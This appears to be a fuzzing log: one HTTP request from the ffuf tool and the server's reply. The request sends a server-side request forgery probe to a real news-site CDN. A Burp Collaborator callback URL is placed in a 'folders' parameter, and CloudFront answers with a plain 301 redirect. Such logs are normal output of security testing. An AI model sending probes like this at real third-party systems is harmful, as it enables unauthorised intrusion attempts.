GET /?folders=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: cmp.cdn.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 301 Moved Permanently
Content-Length: 183
Connection: keep-alive
Content-Type: text/html
Date: Sat, 17 Apr 2021 08:07:04 GMT
Location: https://cmp.cdn.thesun.co.uk/?folders=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net
Server: CloudFront
Via: 1.1 d0c382408f1494b28878807009b3cbdc.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6RGdaOHjLPso_x8-vX8qj_i2_ZNmJe1yEyYF-tr10-9-vj8f0THi4A==
X-Amz-Cf-Pop: SIN52-C2
X-Cache: Redirect from cloudfront

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>CloudFront</center>
</body>
</html>
